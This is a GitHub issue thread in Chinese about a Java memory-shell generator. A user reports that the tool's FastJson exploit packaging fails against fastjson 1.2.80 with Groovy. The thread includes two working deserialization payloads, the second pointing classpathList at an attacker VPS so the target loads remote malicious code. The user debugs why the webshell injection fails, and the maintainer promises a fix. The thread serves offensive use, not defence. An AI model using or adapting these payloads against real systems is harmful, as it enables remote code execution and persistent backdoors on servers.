### ISSUE TITLE
FastJson专项漏洞封装似乎有问题

### ISSUE THREAD

**Issue by shellfeel** [pen4uin/java-memshell-generator-release#12]
**环境：**
jdk:1.8.0.261
org.codehaus.groovy: 3.0.7
springboot: 2.7.8
fastjson: 1.2.80

**描述：**
使用大佬的项目生成jar包放到vps或者解压后使用classpath供靶机加载
分别发送两次payload：
```json
{"@type": "java.lang.Exception",
  "@type": "org.codehaus.groovy.control.CompilationFailedException",
  "unit": {}
}
```
```json
{"@type": "org.codehaus.groovy.control.ProcessingUnit",
  "@type": "org.codehaus.groovy.tools.javac.JavaStubCompilationUnit",
  "config":
  {
    "@type": "org.codehaus.groovy.control.CompilerConfiguration",
  "classpathList": "http://vps_ip"
  }
}
```
结果请求都是成功但内存马却注入失败
<img width="977" alt="image" src="https://github.com/pen4uin/java-memshell-generator-release/assets/18633010/29c1f35f-4799-4494-bb25-07c0a6cda03d">
调试半天发现是 ASTTransformationVisitor对远程的恶意类注解有判断，如果不是GroovyASTTransformation则不会调用
![image](https://github.com/pen4uin/java-memshell-generator-release/assets/18633010/d8f911fb-b65a-4ca0-ae3f-cc0c542ab37b)
反编译工具生成的代码发现确实注解不满足要求：
![image](https://github.com/pen4uin/java-memshell-generator-release/assets/18633010/a17e664d-b267-46fe-bfd4-f0bdc1bb0c23)

工具生成方式：
<img width="893" alt="image" src="https://github.com/pen4uin/java-memshell-generator-release/assets/18633010/51373945-020e-440c-b527-2f57cd941aac">

帮忙看看啥问题

**Comment by pen4uin** [comment]
感谢反馈，已复现问题并完成修复，预计下个版本更新。
